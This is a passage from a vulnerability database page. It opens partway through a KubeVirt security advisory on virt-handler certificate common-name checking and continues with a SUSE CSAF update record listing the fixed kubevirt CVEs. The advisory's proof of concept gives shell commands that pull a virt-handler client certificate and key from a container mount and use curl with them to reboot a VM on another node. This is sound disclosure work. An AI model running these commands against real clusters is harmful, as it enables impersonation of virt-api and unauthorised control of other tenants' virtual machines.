certPool *x509.CertPool, usage x509.ExtKeyUsage, commonName string) error {\n //...\n\trawPeer, rawIntermediates := rawCerts[0], rawCerts[1:]\n\tc, err := x509.ParseCertificate(rawPeer)\n\t//...\n\tfullCommonName := fmt.Sprintf(\"kubevirt.io:system:%s:virt-handler\", commonName)\n\tif !externallyManaged \u0026\u0026 c.Subject.CommonName != fullCommonName {\n\t\treturn fmt.Errorf(\"common name is invalid, expected %s, but got %s\", fullCommonName, c.Subject.CommonName)\n\t}\n\t//...\n```\n\n\nThe above code illustrates that client certificates accepted be KubeVirt should have as CN `kubevirt.io:system:client:virt-handler` which is the same as the CN present in the `virt-api`\u0027s certificate. **However, the latter is not the only component in the KubeVirt stack which can communicate with a `virt-handler` instance**. \n\nIn addition to the extension API server, any other `virt-handler` can communicate with it. This happens in the context of VM migration operations. When a VM is migrated from one node to another, the `virt-handler`s on both nodes are going to use structures called `ProxyManager` to communicate back and forth on the state of the migration. \n\n```go\n//pkg/virt-handler/migration-proxy/migration-proxy.go\n\nfunc NewMigrationProxyManager(serverTLSConfig *tls.Config, clientTLSConfig *tls.Config, config *virtconfig.ClusterConfig) ProxyManager {\n\treturn \u0026migrationProxyManager{\n\t\tsourceProxies: make(map[string][]*migrationProxy),\n\t\ttargetProxies: make(map[string][]*migrationProxy),\n\t\tserverTLSConfig: serverTLSConfig,\n\t\tclientTLSConfig: clientTLSConfig,\n\t\tconfig: config,\n\t}\n}\n```\n\n\nThis communication follows a classical client-server model, where the `virt-handler` on the migration source node acts as a client and the `virt-handler` on the migration destination node acts as a server. This communication is also secured using mTLS. The server certificate presented by the `virt-handler` acting as a migration destination node is the same as the one which is used for the communication between the same `virt-handler` and the `virt-api` in the context of VM lifecycle operations (`CN=kubevirt.io:system:node:virt-handler`). However, the client certificate which is used by a `virt-handler` instance has the same CN as the client certificate used by `virt-api`.\n\n\n\n```bash\nadmin@minikube:~$ openssl x509 -text -in $(CID=$(docker ps --filter \u0027Name=virt-handler\u0027 --format \u0027{{.ID}}\u0027 | head -n 1) \u0026\u0026 docker inspect $CID | grep \"clientcertificates:ro\" | cut -d \":\" -f1 | tr -d \u0027\"[:space:]\u0027)/tls.crt | grep -e \"Subject:\" -e \"Issuer:\" -e \"Serial\"\n\nSerial Number: 2951695854686290384 (0x28f687bdb791c1d0)\nIssuer: CN = kubevirt.io@1747579138\nSubject: CN = kubevirt.io:system:client:virt-handler\n\n```\n\nAlthough the migration procedure, where two separate `virt-handler` instances coordinate the transfer of a VM\u0027s state, is not directly tied to the communication between `virt-api` and `virt-handler` during VM lifecycle management, there is a critical overlap in the TLS authentication mechanism. Specifically, the client certificate used by both `virt-handler` and `virt-api` shares the same CN field, despite the use of different, randomly allocated ports, for the two types of communication.\n\n\n### PoC\n_Complete instructions, including specific configuration details, to reproduce the vulnerability._\n\nTo illustrate the vulnerability, a Minikube cluster has been deployed with two nodes (`minikube` and `minikube-m02`) thus, with two `virt-handler` instances alongside a vmi running on one of the nodes. It is considered that an attacker has obtained access to the client certificate bundle used by the `virt-handler` instance running on the compromised node (`minikube`) while the virtual machine is running on the other node (`minikube-m02`). Thus, they can interact with the sub-resource API exposed by the other `virt-handler` instance and control the lifecycle of the VMs running on the other node:\n\n\n```yaml\n# the deployed VMI on the non-compromised node minikube-m02\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n labels:\n kubevirt.io/size: small\n name: mishandling-common-name-in-certificate-handler\nspec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n\n - name: cloudinitdisk\n disk:\n bus: virtio\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: cloudinitdisk \n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\n\n```bash\n# the IP of the non-compromised handler running on the node minikube-m02 is 10.244.1.3\nattacker@minikube:~$ curl -k https://10.244.1.3:8186/\ncurl: (56) OpenSSL SSL_read: error:0A00045C:SSL routines::tlsv13 alert certificate required, errno 0\n# get the certificate bundle directory and redo the request\nattacker@minikube:~$ export CERT_DIR=$(docker inspect $(docker ps --filter \u0027Name=virt-handler\u0027 --format=\u0027{{.ID}}\u0027 | head -n 1) | grep \"clientcertificates:ro\" | cut -d \u0027:\u0027 -f1 | tr -d \u0027\"[:space:]\u0027)\n\nattacker@minikube:~$ curl -k --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/\n404: Page Not Found\n\n# soft reboot the VMI instance running on the other node\nattacker@minikube:~$ curl -ki --cert ${CERT_DIR}/tls.crt --key ${CERT_DIR}/tls.key https://10.244.1.3:8186/v1/namespaces/default/virtualmachineinstances/mishandling-common-name-in-certificate-handler/softreboot -XPUT\nHTTP/1.1 202 Accepted\n# the VMI mishandling-common-name-in-certificate-handler has been rebooted\n```\n\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nDue to the peer verification logic in `virt-handler` (via `verifyPeerCert`), an attacker who compromises a `virt-handler` instance, could exploit these shared credentials to impersonate `virt-api` and execute privileged operations against other `virt-handler` instances potentially compromising the integrity and availability of the managed by it VM.",
"id": "GHSA-ggp9-c99x-54gp",
"modified": "2025-11-27T08:48:13Z",
"published": "2025-11-06T23:35:03Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64434"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt\u0027s Improper TLS Certificate Management Handling Allows API Identity Spoofing"
}
SUSE-SU-2026:20610-1
Vulnerability from csaf_suse - Published: 2026-02-27 08:49 - Updated: 2026-02-27 08:49Summary
Security update for kubevirt
Notes
Title of the patch
Security update for kubevirt
Description of the patch
This update for kubevirt fixes the following issues:
Update to version 1.7.0 (bsc#1257128).
Security issues fixed:
- CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS
(bsc#1253189).
- CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into
creating empty files/directories on host (bsc#1257422).
- CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction
(bsc#1241772).
- CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to
bypass existing RBAC controls (bsc#1253181).
- CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).
- CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations
(bsc#1253186).
- CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).
- CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users
(bsc#1253748).
Other updates and bugfixes:
- Upstream now uses stateless firmware for CoCo VMs.
Patchnames
SUSE-SLES-16.0-319
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt fixes the following issues:\n\nUpdate to version 1.7.0 (bsc#1257128).\n\nSecurity issues fixed:\n\n - CVE-2025-64435: logic flaw in the virt-controller can lead to incorrect status updates and potentially causing a DoS\n (bsc#1253189).\n - CVE-2024-45310: kubevirt vendored github.com/opencontainers/runc/libcontainer/utils: runc can be tricked into\n creating empty files/directories on host (bsc#1257422).\n - CVE-2025-22872: incorrectly interpreted tags can cause content to be placed wrong scope during DOM construction\n (bsc#1241772).\n - CVE-2025-64432: fail to correctly validate certain fields in the client TLS certificate may allow an attacker to\n bypass existing RBAC controls (bsc#1253181).\n - CVE-2025-64433: improper symlink handling can allow to read arbitrary files (bsc#1253185).\n - CVE-2025-64434: compromising virt-handler instance can lead to impersonate virt-api and execute privileged operations\n (bsc#1253186).\n - CVE-2025-64437: mishandling of symlinks can lead to compromising the CIA (bsc#1253194).\n - CVE-2025-64324: a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users\n (bsc#1253748).\n\nOther updates and bugfixes:\n\n - Upstream now uses stateless firmware for CoCo VMs.\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-16.0-319",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20610-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20610-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620610-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20610-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024607.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253189",
"url": "https://bugzilla.suse.com/1253189"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE Bug 1257128",
"url": "https://bugzilla.suse.com/1257128"
},
{
"category": "self",
"summary": "SUSE Bug 1257422",
"url": "https://bugzilla.suse.com/1257422"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45310 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45310/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64435 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64435/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt",
"tracking": {
"current_release_date": "2026-02-27T08:49:48Z",
"generator": {
"date": "2026-02-27T08:49:48Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20610-1",
"initial_release_date": "2026-02-27T08:49:48Z",
"revision_history": [
{
"date": "2026-02-27T08:49:48Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"product_id": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product": {
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server-sap"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-45310",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45310"
}
],
"notes": [
{
"category": "general",
"text": "runc is a CLI tool for spawning and running containers according to the OCI specification. runc 1.1.13 and earlier, as well as 1.2.0-rc2 and earlier, can be tricked into creating empty files or directories in arbitrary locations in the host filesystem by sharing a volume between two containers and exploiting a race with `os.MkdirAll`. While this could be used to create empty files, existing files would not be truncated. An attacker must have the ability to start containers using some kind of custom volume configuration. Containers using user namespaces are still affected, but the scope of places an attacker can create inodes can be significantly reduced. Sufficiently strict LSM policies (SELinux/Apparmor) can also in principle block this attack -- we suspect the industry standard SELinux policy may restrict this attack\u0027s scope but the exact scope of protection hasn\u0027t been analysed. This is exploitable using runc directly as well as through Docker and Kubernetes. The issue is fixed in runc v1.1.14 and v1.2.0-rc3.\n\nSome workarounds are available. Using user namespaces restricts this attack fairly significantly such that the attacker can only create inodes in directories that the remapped root user/group has write access to. Unless the root user is remapped to an actual\nuser on the host (such as with rootless containers that don\u0027t use `/etc/sub[ug]id`), this in practice means that an attacker would only be able to create inodes in world-writable directories. A strict enough SELinux or AppArmor policy could in principle also restrict the scope if a specific label is applied to the runc runtime, though neither the extent to which the standard existing policies block this attack nor what exact policies are needed to sufficiently restrict this attack have been thoroughly tested.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45310",
"url": "https://www.suse.com/security/cve/CVE-2024-45310"
},
{
"category": "external",
"summary": "SUSE Bug 1230092 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1230092"
},
{
"category": "external",
"summary": "SUSE Bug 1257413 for CVE-2024-45310",
"url": "https://bugzilla.suse.com/1257413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.6,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "low"
}
],
"title": "CVE-2024-45310"
},
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:49:48Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64435",
"url": "https://www.suse.com/security/cve/CVE-2025-64435"
},
{
"category": "external",
"summary": "SUSE Bug 1253189 for CVE-2025-64435",
"url": "https://bugzilla.suse.com/1253189"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64"
]
}
],
